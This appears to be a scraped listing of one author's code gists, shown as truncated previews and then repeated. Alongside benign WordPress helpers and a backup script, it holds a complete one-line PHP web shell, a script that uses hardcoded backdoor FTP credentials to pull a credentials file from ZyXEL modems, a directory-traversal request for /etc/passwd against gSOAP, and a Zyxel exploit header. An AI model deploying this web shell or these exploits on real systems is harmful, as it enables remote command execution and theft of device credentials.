numan numanturle

## Search Block in Transient (30 Sec)
 // Get user IP in WordPress
function get_the_user_ip() {
	if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
	//check ip from share internet
	$ip = $_SERVER['HTTP_CLIENT_IP'];
	}else {
	$ip = $_SERVER['REMOTE_ADDR'];
	}
	return apply_filters( 'wpb_get_ip', $ip );
}

## crawler_detect.php
<?php

/**
 * Check if the given user agent string is one of a crawler, spider, or bot.
 *
 * @param string $user_agent
 *   A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html))
 *
 * @return bool
 *   TRUE if the user agent is a bot, FALSE if not.

## dizindeki bozuk türkçe karakterlerini düzeltmek için
aynı dizinde bulunan bozuk türkçe karakterlerini düzeltir.

## yedek.sh
#!/bin/sh
BACKUP=/tmp/backup.$$
NOW=$(date +"%Y-%m-%d")
FTPD="/yedek"
FTPS="SUNUCU"
FTPU="USER"
FTPP="PASS"
FTPPO="PORT"
DBS="dbname dbname2 mysql"
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :

## Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0


@modem_gateway = "192.168.1.1" // default address

## ZyXEL VMG3312-B10B - Leak Credentials < 1.00(AAPP.7)
<?php
$ftp_server = "192.168.1.1"; // modem ip address
$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
$login = ftp_login($ftp_conn, "support", "support"); // backdoor

$local_file = "crackme";
$server_file = "/var/csamu"; // base64_encode files

if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
	$open = file($local_file);

## functions.php
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
    $file = get_attached_file($post_ID);
	$get_file_title = get_post($post_ID);
	if($get_file_title->post_parent){
		$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
		$path = pathinfo($file);

		$newfilename = $post_santize_title."-".$post_ID;

## gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool

start = time.time()

## gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response

## 22 byte php webshell
<?=$_GET[z]($_GET[x]);
	// Get user IP in WordPress
	function get_the_user_ip() {
	if ( ! empty( $_SERVER['HTTP_CLIENT_IP'] ) ) {
	//check ip from share internet
	$ip = $_SERVER['HTTP_CLIENT_IP'];
	}else {
	$ip = $_SERVER['REMOTE_ADDR'];
	}
	return apply_filters( 'wpb_get_ip', $ip );
	}
	<?php

	/**
	* Check if the given user agent string is one of a crawler, spider, or bot.
	*
	* @param string $user_agent
	* A user agent string (e.g. Googlebot/2.1 (+http://www.google.com/bot.html))
	*
	* @return bool
	* TRUE if the user agent is a bot, FALSE if not.
	#!/bin/sh
	BACKUP=/tmp/backup.$$
	NOW=$(date +"%Y-%m-%d")
	FTPD="/yedek"
	FTPS="SUNUCU"
	FTPU="USER"
	FTPP="PASS"
	FTPPO="PORT"
	DBS="dbname dbname2 mysql"
	[ ! -d $BACKUP ] && mkdir -p $BACKUP \|\| :
	# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
	# Date: 2018-11-17
	# Exploit Author: numan türle @numanturle
	# Vendor Homepage: https://www.zyxel.com/
	# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
	# Tested on: macOS
	# Fixed firmware: 5.13(AAXA.8)C0


	@modem_gateway = "192.168.1.1" // default address
	<?php
	$ftp_server = "192.168.1.1"; // modem ip address
	$ftp_conn = ftp_connect($ftp_server) or die("ftp server close");
	$login = ftp_login($ftp_conn, "support", "support"); // backdoor

	$local_file = "crackme";
	$server_file = "/var/csamu"; // base64_encode files

	if (ftp_get($ftp_conn, $local_file, $server_file, FTP_BINARY)) {
	$open = file($local_file);
	<?php
	add_action('add_attachment', 'rename_attachment');
	function rename_attachment($post_ID){
	$file = get_attached_file($post_ID);
	$get_file_title = get_post($post_ID);
	if($get_file_title->post_parent){
	$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
	$path = pathinfo($file);

	$newfilename = $post_santize_title."-".$post_ID;
	#!/usr/bin/env python
	# -- coding: utf-8 --
	# encoding=utf8
	import urllib.request
	import urllib.error
	import time
	from multiprocessing import Pool

	start = time.time()
	Request
	############################
	GET /../../../../../../../../../etc/passwd HTTP/1.1
	Host: 10.200.106.101
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
	Accept-Encoding: gzip, deflate
	Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
	Connection: close

	Response